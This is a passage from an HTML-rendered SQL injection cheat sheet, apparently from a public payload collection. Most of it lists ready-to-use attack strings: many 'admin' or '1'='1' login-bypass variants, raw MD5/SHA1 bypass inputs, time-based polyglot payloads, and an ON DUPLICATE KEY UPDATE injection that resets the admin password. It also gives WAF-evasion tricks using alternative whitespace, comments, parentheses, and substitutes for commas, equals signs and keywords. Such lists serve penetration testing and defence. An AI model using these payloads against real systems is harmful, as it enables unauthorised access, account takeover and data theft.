<a id="__codelineno-17-37" name="__codelineno-17-37" href="#__codelineno-17-37"></a><span class="s1">&quot;) or (&quot;x&quot;)=(&quot;x</span>
<a id="__codelineno-17-38" name="__codelineno-17-38" href="#__codelineno-17-38"></a><span class="s1">&quot;)) or ((&quot;x&quot;))=((&quot;x</span>
<a id="__codelineno-17-39" name="__codelineno-17-39" href="#__codelineno-17-39"></a><span class="s1">or 2 like 2</span>
<a id="__codelineno-17-40" name="__codelineno-17-40" href="#__codelineno-17-40"></a><span class="s1">or 1=1</span>
<a id="__codelineno-17-41" name="__codelineno-17-41" href="#__codelineno-17-41"></a><span class="s1">or 1=1--</span>
<a id="__codelineno-17-42" name="__codelineno-17-42" href="#__codelineno-17-42"></a><span class="s1">or 1=1#</span>
<a id="__codelineno-17-43" name="__codelineno-17-43" href="#__codelineno-17-43"></a><span class="s1">or 1=1/*</span>
<a id="__codelineno-17-44" name="__codelineno-17-44" href="#__codelineno-17-44"></a><span class="s1">admin&#39;</span><span class="w"> </span><span class="c1">--</span>
<a id="__codelineno-17-45" name="__codelineno-17-45" href="#__codelineno-17-45"></a><span class="k">admin</span><span class="s1">&#39; -- -</span>
<a id="__codelineno-17-46" name="__codelineno-17-46" href="#__codelineno-17-46"></a><span class="s1">admin&#39;</span><span class="w"> </span><span class="o">#</span>
<a id="__codelineno-17-47" name="__codelineno-17-47" href="#__codelineno-17-47"></a><span class="k">admin</span><span class="s1">&#39;/*</span>
<a id="__codelineno-17-48" name="__codelineno-17-48" href="#__codelineno-17-48"></a><span class="s1">admin&#39;</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="s1">&#39;2&#39;</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;1</span>
<a id="__codelineno-17-49" name="__codelineno-17-49" href="#__codelineno-17-49"></a><span class="s1">admin&#39;</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="mi">2</span><span class="c1">--</span>
<a id="__codelineno-17-50" name="__codelineno-17-50" href="#__codelineno-17-50"></a><span class="k">admin</span><span class="s1">&#39; or 2 LIKE 2#</span>
<a id="__codelineno-17-51" name="__codelineno-17-51" href="#__codelineno-17-51"></a><span class="s1">admin&#39;</span><span class="p">)</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="mi">2</span><span class="o">#</span>
<a id="__codelineno-17-52" name="__codelineno-17-52" href="#__codelineno-17-52"></a><span class="k">admin</span><span class="s1">&#39;) or 2 LIKE 2--</span>
<a id="__codelineno-17-53" name="__codelineno-17-53" href="#__codelineno-17-53"></a><span class="s1">admin&#39;</span><span class="p">)</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="p">(</span><span class="s1">&#39;2&#39;</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;2</span>
<a id="__codelineno-17-54" name="__codelineno-17-54" href="#__codelineno-17-54"></a><span class="s1">admin&#39;</span><span class="p">)</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="p">(</span><span class="s1">&#39;2&#39;</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;2&#39;</span><span class="o">#</span>
<a id="__codelineno-17-55" name="__codelineno-17-55" href="#__codelineno-17-55"></a><span class="k">admin</span><span class="s1">&#39;) or (&#39;</span><span class="mi">2</span><span class="s1">&#39; LIKE &#39;</span><span class="mi">2</span><span class="s1">&#39;/*</span>
<a id="__codelineno-17-56" name="__codelineno-17-56" href="#__codelineno-17-56"></a><span class="s1">admin&#39;</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="s1">&#39;1&#39;</span><span class="o">=</span><span class="s1">&#39;1</span>
<a id="__codelineno-17-57" name="__codelineno-17-57" href="#__codelineno-17-57"></a><span class="s1">admin&#39;</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="s1">&#39;1&#39;</span><span class="o">=</span><span class="s1">&#39;1&#39;</span><span class="c1">--</span>
<a id="__codelineno-17-58" name="__codelineno-17-58" href="#__codelineno-17-58"></a><span class="k">admin</span><span class="s1">&#39; or &#39;</span><span class="mi">1</span><span class="s1">&#39;=&#39;</span><span class="mi">1</span><span class="s1">&#39;#</span>
<a id="__codelineno-17-59" name="__codelineno-17-59" href="#__codelineno-17-59"></a><span class="s1">admin&#39;</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="s1">&#39;1&#39;</span><span class="o">=</span><span class="s1">&#39;1&#39;</span><span class="cm">/*</span>
<a id="__codelineno-17-60" name="__codelineno-17-60" href="#__codelineno-17-60"></a><span class="cm">admin&#39;or 1=1 or &#39;&#39;=&#39;</span>
<a id="__codelineno-17-61" name="__codelineno-17-61" href="#__codelineno-17-61"></a><span class="cm">admin&#39; or 1=1</span>
<a id="__codelineno-17-62" name="__codelineno-17-62" href="#__codelineno-17-62"></a><span class="cm">admin&#39; or 1=1--</span>
<a id="__codelineno-17-63" name="__codelineno-17-63" href="#__codelineno-17-63"></a><span class="cm">admin&#39; or 1=1#</span>
<a id="__codelineno-17-64" name="__codelineno-17-64" href="#__codelineno-17-64"></a><span class="cm">admin&#39; or 1=1/*</span>
<a id="__codelineno-17-65" name="__codelineno-17-65" href="#__codelineno-17-65"></a><span class="cm">admin&#39;) or (&#39;1&#39;=&#39;1</span>
<a id="__codelineno-17-66" name="__codelineno-17-66" href="#__codelineno-17-66"></a><span class="cm">admin&#39;) or (&#39;1&#39;=&#39;1&#39;--</span>
<a id="__codelineno-17-67" name="__codelineno-17-67" href="#__codelineno-17-67"></a><span class="cm">admin&#39;) or (&#39;1&#39;=&#39;1&#39;#</span>
<a id="__codelineno-17-68" name="__codelineno-17-68" href="#__codelineno-17-68"></a><span class="cm">admin&#39;) or (&#39;1&#39;=&#39;1&#39;/*</span>
<a id="__codelineno-17-69" name="__codelineno-17-69" href="#__codelineno-17-69"></a><span class="cm">admin&#39;) or &#39;1&#39;=&#39;1</span>
<a id="__codelineno-17-70" name="__codelineno-17-70" href="#__codelineno-17-70"></a><span class="cm">admin&#39;) or &#39;1&#39;=&#39;1&#39;--</span>
<a id="__codelineno-17-71" name="__codelineno-17-71" href="#__codelineno-17-71"></a><span class="cm">admin&#39;) or &#39;1&#39;=&#39;1&#39;#</span>
<a id="__codelineno-17-72" name="__codelineno-17-72" href="#__codelineno-17-72"></a><span class="cm">admin&#39;) or &#39;1&#39;=&#39;1&#39;/*</span>
<a id="__codelineno-17-73" name="__codelineno-17-73" href="#__codelineno-17-73"></a><span class="cm">1234 &#39; AND 1=0 UNION ALL SELECT &#39;admin&#39;, &#39;81dc9bdb52d04dc20036dbd8313ed055</span>
<a id="__codelineno-17-74" name="__codelineno-17-74" href="#__codelineno-17-74"></a><span class="cm">admin&quot; --</span>
<a id="__codelineno-17-75" name="__codelineno-17-75" href="#__codelineno-17-75"></a><span class="cm">admin&#39;;-- azer </span>
<a id="__codelineno-17-76" name="__codelineno-17-76" href="#__codelineno-17-76"></a><span class="cm">admin&quot; #</span>
<a id="__codelineno-17-77" name="__codelineno-17-77" href="#__codelineno-17-77"></a><span class="cm">admin&quot;/*</span>
<a id="__codelineno-17-78" name="__codelineno-17-78" href="#__codelineno-17-78"></a><span class="cm">admin&quot; or &quot;1&quot;=&quot;1</span>
<a id="__codelineno-17-79" name="__codelineno-17-79" href="#__codelineno-17-79"></a><span class="cm">admin&quot; or &quot;1&quot;=&quot;1&quot;--</span>
<a id="__codelineno-17-80" name="__codelineno-17-80" href="#__codelineno-17-80"></a><span class="cm">admin&quot; or &quot;1&quot;=&quot;1&quot;#</span>
<a id="__codelineno-17-81" name="__codelineno-17-81" href="#__codelineno-17-81"></a><span class="cm">admin&quot; or &quot;1&quot;=&quot;1&quot;/*</span>
<a id="__codelineno-17-82" name="__codelineno-17-82" href="#__codelineno-17-82"></a><span class="cm">admin&quot;or 1=1 or &quot;&quot;=&quot;</span>
<a id="__codelineno-17-83" name="__codelineno-17-83" href="#__codelineno-17-83"></a><span class="cm">admin&quot; or 1=1</span>
<a id="__codelineno-17-84" name="__codelineno-17-84" href="#__codelineno-17-84"></a><span class="cm">admin&quot; or 1=1--</span>
<a id="__codelineno-17-85" name="__codelineno-17-85" href="#__codelineno-17-85"></a><span class="cm">admin&quot; or 1=1#</span>
<a id="__codelineno-17-86" name="__codelineno-17-86" href="#__codelineno-17-86"></a><span class="cm">admin&quot; or 1=1/*</span>
<a id="__codelineno-17-87" name="__codelineno-17-87" href="#__codelineno-17-87"></a><span class="cm">admin&quot;) or (&quot;1&quot;=&quot;1</span>
<a id="__codelineno-17-88" name="__codelineno-17-88" href="#__codelineno-17-88"></a><span class="cm">admin&quot;) or (&quot;1&quot;=&quot;1&quot;--</span>
<a id="__codelineno-17-89" name="__codelineno-17-89" href="#__codelineno-17-89"></a><span class="cm">admin&quot;) or (&quot;1&quot;=&quot;1&quot;#</span>
<a id="__codelineno-17-90" name="__codelineno-17-90" href="#__codelineno-17-90"></a><span class="cm">admin&quot;) or (&quot;1&quot;=&quot;1&quot;/*</span>
<a id="__codelineno-17-91" name="__codelineno-17-91" href="#__codelineno-17-91"></a><span class="cm">admin&quot;) or &quot;1&quot;=&quot;1</span>
<a id="__codelineno-17-92" name="__codelineno-17-92" href="#__codelineno-17-92"></a><span class="cm">admin&quot;) or &quot;1&quot;=&quot;1&quot;--</span>
<a id="__codelineno-17-93" name="__codelineno-17-93" href="#__codelineno-17-93"></a><span class="cm">admin&quot;) or &quot;1&quot;=&quot;1&quot;#</span>
<a id="__codelineno-17-94" name="__codelineno-17-94" href="#__codelineno-17-94"></a><span class="cm">admin&quot;) or &quot;1&quot;=&quot;1&quot;/*</span>
<a id="__codelineno-17-95" name="__codelineno-17-95" href="#__codelineno-17-95"></a><span class="cm">1234 &quot; AND 1=0 UNION ALL SELECT &quot;admin&quot;, &quot;81dc9bdb52d04dc20036dbd8313ed055</span>
</code></pre></div>
<h2 id="authentication-bypass-raw-md5-sha1">Authentication Bypass (Raw MD5 SHA1)</h2>
<p>When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="x">&quot;SELECT * FROM admin WHERE pass = &#39;&quot;.md5($password,true).&quot;&#39;&quot;</span>
</code></pre></div>
<p>Allowing an attacker to craft a string with a <code>true</code> statement such as <code>' or 'SOMETHING</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="x">md5(&quot;ffifdyop&quot;, true) = &#39;or&#39;6<EFBFBD>]<5D><>!r,<2C><>b</span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="x">sha1(&quot;3fDf &quot;, true) = Q<>u&#39;=&#39;<EFBFBD>@<40>[<5B>t<EFBFBD>- o<><6F>_-!</span>
</code></pre></div>
<p>Challenge demo available at <a href="http://web.jarvisoj.com:32772">http://web.jarvisoj.com:32772</a></p>
<h2 id="polyglot-injection-multicontext">Polyglot injection (multicontext)</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="n">SLEEP</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="cm">/*&#39; or SLEEP(1) or &#39;&quot; or SLEEP(1) or &quot;*/</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a>
<a id="__codelineno-20-3" name="__codelineno-20-3" href="#__codelineno-20-3"></a><span class="cm">/* MySQL only */</span>
<a id="__codelineno-20-4" name="__codelineno-20-4" href="#__codelineno-20-4"></a><span class="k">IF</span><span class="p">(</span><span class="n">SUBSTR</span><span class="p">(</span><span class="o">@@</span><span class="k">version</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="o">&lt;</span><span class="mi">5</span><span class="p">,</span><span class="n">BENCHMARK</span><span class="p">(</span><span class="mi">2000000</span><span class="p">,</span><span class="n">SHA1</span><span class="p">(</span><span class="mi">0</span><span class="n">xDE7EC71F1</span><span class="p">)),</span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span><span class="cm">/*&#39;XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR&#39;|&quot;XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR&quot;*/</span>
</code></pre></div>
<h2 id="routed-injection">Routed injection</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="k">admin</span><span class="s1">&#39; AND 1=0 UNION ALL SELECT &#39;</span><span class="k">admin</span><span class="s1">&#39;, &#39;</span><span class="mi">81</span><span class="n">dc9bdb52d04dc20036dbd8313ed055</span><span class="err">&#39;</span>
</code></pre></div>
<h2 id="insert-statement-on-duplicate-key-update">Insert Statement - ON DUPLICATE KEY UPDATE</h2>
<p>ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="n">Inject</span><span class="w"> </span><span class="k">using</span><span class="w"> </span><span class="n">payload</span><span class="p">:</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a><span class="w"> </span><span class="n">attacker_dummy</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">com</span><span class="ss">&quot;, &quot;</span><span class="n">bcrypt_hash_of_qwerty</span><span class="ss">&quot;), (&quot;</span><span class="k">admin</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">com</span><span class="ss">&quot;, &quot;</span><span class="n">bcrypt_hash_of_qwerty</span><span class="ss">&quot;) ON DUPLICATE KEY UPDATE password=&quot;</span><span class="n">bcrypt_hash_of_qwerty</span><span class="ss">&quot; --</span>
<a id="__codelineno-22-3" name="__codelineno-22-3" href="#__codelineno-22-3"></a>
<a id="__codelineno-22-4" name="__codelineno-22-4" href="#__codelineno-22-4"></a><span class="ss">The query would look like this:</span>
<a id="__codelineno-22-5" name="__codelineno-22-5" href="#__codelineno-22-5"></a><span class="ss">INSERT INTO users (email, password) VALUES (&quot;</span><span class="n">attacker_dummy</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">com</span><span class="ss">&quot;, &quot;</span><span class="n">bcrypt_hash_of_qwerty</span><span class="ss">&quot;), (&quot;</span><span class="k">admin</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">com</span><span class="ss">&quot;, &quot;</span><span class="n">bcrypt_hash_of_qwerty</span><span class="ss">&quot;) ON DUPLICATE KEY UPDATE password=&quot;</span><span class="n">bcrypt_hash_of_qwerty</span><span class="ss">&quot; -- &quot;</span><span class="p">,</span><span class="w"> </span><span class="ss">&quot;bcrypt_hash_of_your_password_input&quot;</span><span class="p">);</span>
<a id="__codelineno-22-6" name="__codelineno-22-6" href="#__codelineno-22-6"></a>
<a id="__codelineno-22-7" name="__codelineno-22-7" href="#__codelineno-22-7"></a><span class="n">This</span><span class="w"> </span><span class="n">query</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="k">insert</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="k">row</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="k">user</span><span class="w"> </span><span class="err"></span><span class="n">attacker_dummy</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">com</span><span class="err"></span><span class="p">.</span><span class="w"> </span><span class="n">It</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="n">also</span><span class="w"> </span><span class="k">insert</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="k">row</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="k">user</span><span class="w"> </span><span class="err"></span><span class="k">admin</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">com</span><span class="err"></span><span class="p">.</span>
<a id="__codelineno-22-8" name="__codelineno-22-8" href="#__codelineno-22-8"></a><span class="n">Because</span><span class="w"> </span><span class="n">this</span><span class="w"> </span><span class="k">row</span><span class="w"> </span><span class="n">already</span><span class="w"> </span><span class="k">exists</span><span class="p">,</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="k">ON</span><span class="w"> </span><span class="n">DUPLICATE</span><span class="w"> </span><span class="k">KEY</span><span class="w"> </span><span class="k">UPDATE</span><span class="w"> </span><span class="n">keyword</span><span class="w"> </span><span class="n">tells</span><span class="w"> </span><span class="n">MySQL</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="k">update</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="o">`</span><span class="n">password</span><span class="o">`</span><span class="w"> </span><span class="k">column</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">already</span><span class="w"> </span><span class="k">existing</span><span class="w"> </span><span class="k">row</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="ss">&quot;bcrypt_hash_of_qwerty&quot;</span><span class="p">.</span>
<a id="__codelineno-22-9" name="__codelineno-22-9" href="#__codelineno-22-9"></a>
<a id="__codelineno-22-10" name="__codelineno-22-10" href="#__codelineno-22-10"></a><span class="k">After</span><span class="w"> </span><span class="n">this</span><span class="p">,</span><span class="w"> </span><span class="n">we</span><span class="w"> </span><span class="n">can</span><span class="w"> </span><span class="n">simply</span><span class="w"> </span><span class="n">authenticate</span><span class="w"> </span><span class="k">with</span><span class="w"> </span><span class="err"></span><span class="k">admin</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">com</span><span class="err"></span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="err"></span><span class="n">qwerty</span><span class="err"></span><span class="o">!</span>
</code></pre></div>
<h2 id="generic-waf-bypass">Generic WAF Bypass</h2>
<h3 id="white-spaces-alternatives">White spaces alternatives</h3>
<ul>
<li>No space allowed (<code>%20</code>) - bypass using whitespace alternatives
<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="mi">09</span><span class="k">and</span><span class="o">%</span><span class="mi">091</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="mi">09</span><span class="c1">--</span>
<a id="__codelineno-23-2" name="__codelineno-23-2" href="#__codelineno-23-2"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="mi">0</span><span class="n">Dand</span><span class="o">%</span><span class="mi">0</span><span class="n">D1</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="mi">0</span><span class="n">D</span><span class="c1">--</span>
<a id="__codelineno-23-3" name="__codelineno-23-3" href="#__codelineno-23-3"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="mi">0</span><span class="n">Cand</span><span class="o">%</span><span class="mi">0</span><span class="n">C1</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="mi">0</span><span class="k">C</span><span class="c1">--</span>
<a id="__codelineno-23-4" name="__codelineno-23-4" href="#__codelineno-23-4"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="mi">0</span><span class="n">Band</span><span class="o">%</span><span class="mi">0</span><span class="n">B1</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="mi">0</span><span class="n">B</span><span class="c1">--</span>
<a id="__codelineno-23-5" name="__codelineno-23-5" href="#__codelineno-23-5"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="mi">0</span><span class="n">Aand</span><span class="o">%</span><span class="mi">0</span><span class="n">A1</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="mi">0</span><span class="n">A</span><span class="c1">--</span>
<a id="__codelineno-23-6" name="__codelineno-23-6" href="#__codelineno-23-6"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="n">A0and</span><span class="o">%</span><span class="n">A01</span><span class="o">=</span><span class="mi">1</span><span class="o">%</span><span class="n">A0</span><span class="c1">--</span>
</code></pre></div></li>
<li>No whitespace - bypass using comments
<div class="highlight"><pre><span></span><code><a id="__codelineno-24-1" name="__codelineno-24-1" href="#__codelineno-24-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="cm">/*comment*/</span><span class="k">and</span><span class="cm">/**/</span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="cm">/**/</span><span class="c1">--</span>
</code></pre></div></li>
<li>No Whitespace - bypass using parenthesis
<div class="highlight"><pre><span></span><code><a id="__codelineno-25-1" name="__codelineno-25-1" href="#__codelineno-25-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="k">and</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="c1">--</span>
</code></pre></div></li>
<li>Whitespace alternatives by DBMS
<div class="highlight"><pre><span></span><code><a id="__codelineno-26-1" name="__codelineno-26-1" href="#__codelineno-26-1"></a><span class="c1">-- Example of query where spaces were replaced by ascii characters above 0x80</span>
<a id="__codelineno-26-2" name="__codelineno-26-2" href="#__codelineno-26-2"></a><span class="err"></span><span class="k">SELECT</span><span class="err">§</span><span class="o">*</span><span class="err"></span><span class="k">FROM</span><span class="err"></span><span class="n">users</span><span class="err"></span><span class="k">WHERE</span><span class="err"></span><span class="mi">1</span><span class="err"></span><span class="o">=</span><span class="err"></span><span class="mi">1</span><span class="err"></span>
</code></pre></div></li>
</ul>
<table>
<thead>
<tr>
<th>DBMS</th>
<th>ASCII characters in hexadicimal</th>
</tr>
</thead>
<tbody>
<tr>
<td>SQLite3</td>
<td>0A, 0D, 0C, 09, 20</td>
</tr>
<tr>
<td>MySQL 5</td>
<td>09, 0A, 0B, 0C, 0D, A0, 20</td>
</tr>
<tr>
<td>MySQL 3</td>
<td>01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0</td>
</tr>
<tr>
<td>PostgreSQL</td>
<td>0A, 0D, 0C, 09, 20</td>
</tr>
<tr>
<td>Oracle 11g</td>
<td>00, 0A, 0D, 0C, 09, 20</td>
</tr>
<tr>
<td>MSSQL</td>
<td>01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20</td>
</tr>
</tbody>
</table>
<h3 id="no-comma-allowed">No Comma Allowed</h3>
<p>Bypass using OFFSET, FROM and JOIN</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-27-1" name="__codelineno-27-1" href="#__codelineno-27-1"></a><span class="k">LIMIT</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="w"> </span><span class="o">-&gt;</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="k">OFFSET</span><span class="w"> </span><span class="mi">0</span>
<a id="__codelineno-27-2" name="__codelineno-27-2" href="#__codelineno-27-2"></a><span class="n">SUBSTR</span><span class="p">(</span><span class="s1">&#39;SQL&#39;</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">-&gt;</span><span class="w"> </span><span class="n">SUBSTR</span><span class="p">(</span><span class="s1">&#39;SQL&#39;</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="k">FOR</span><span class="w"> </span><span class="mi">1</span><span class="p">).</span>
<a id="__codelineno-27-3" name="__codelineno-27-3" href="#__codelineno-27-3"></a><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="w"> </span><span class="o">-&gt;</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="n">a</span><span class="w"> </span><span class="k">JOIN</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="n">b</span><span class="w"> </span><span class="k">JOIN</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">3</span><span class="p">)</span><span class="k">c</span><span class="w"> </span><span class="k">JOIN</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="n">d</span>
</code></pre></div>
<h3 id="no-equal-allowed">No Equal Allowed</h3>
<p>Bypass using LIKE/NOT IN/IN/BETWEEN</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-28-1" name="__codelineno-28-1" href="#__codelineno-28-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">substring</span><span class="p">(</span><span class="k">version</span><span class="p">(),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="k">like</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span>
<a id="__codelineno-28-2" name="__codelineno-28-2" href="#__codelineno-28-2"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">substring</span><span class="p">(</span><span class="k">version</span><span class="p">(),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="k">not</span><span class="w"> </span><span class="k">in</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span><span class="mi">3</span><span class="p">)</span>
<a id="__codelineno-28-3" name="__codelineno-28-3" href="#__codelineno-28-3"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">substring</span><span class="p">(</span><span class="k">version</span><span class="p">(),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="k">in</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span><span class="mi">3</span><span class="p">)</span>
<a id="__codelineno-28-4" name="__codelineno-28-4" href="#__codelineno-28-4"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">substring</span><span class="p">(</span><span class="k">version</span><span class="p">(),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="k">between</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="mi">4</span>
</code></pre></div>
<h3 id="case-modification">Case modification</h3>
<ul>
<li>Bypass using uppercase/lowercase (see keyword AND)
<div class="highlight"><pre><span></span><code><a id="__codelineno-29-1" name="__codelineno-29-1" href="#__codelineno-29-1"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="o">#</span>
<a id="__codelineno-29-2" name="__codelineno-29-2" href="#__codelineno-29-2"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">AnD</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="o">#</span>
<a id="__codelineno-29-3" name="__codelineno-29-3" href="#__codelineno-29-3"></a><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">aNd</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="o">#</span>
</code></pre></div></li>
<li>Bypass using keywords case insensitive / Bypass using an equivalent operator
<div class="highlight"><pre><span></span><code><a id="__codelineno-30-1" name="__codelineno-30-1" href="#__codelineno-30-1"></a><span class="k">AND</span><span class="w"> </span><span class="o">-&gt;</span><span class="w"> </span><span class="o">&amp;&amp;</span>
<a id="__codelineno-30-2" name="__codelineno-30-2" href="#__codelineno-30-2"></a><span class="k">OR</span><span class="w"> </span><span class="o">-&gt;</span><span class="w"> </span><span class="o">||</span>
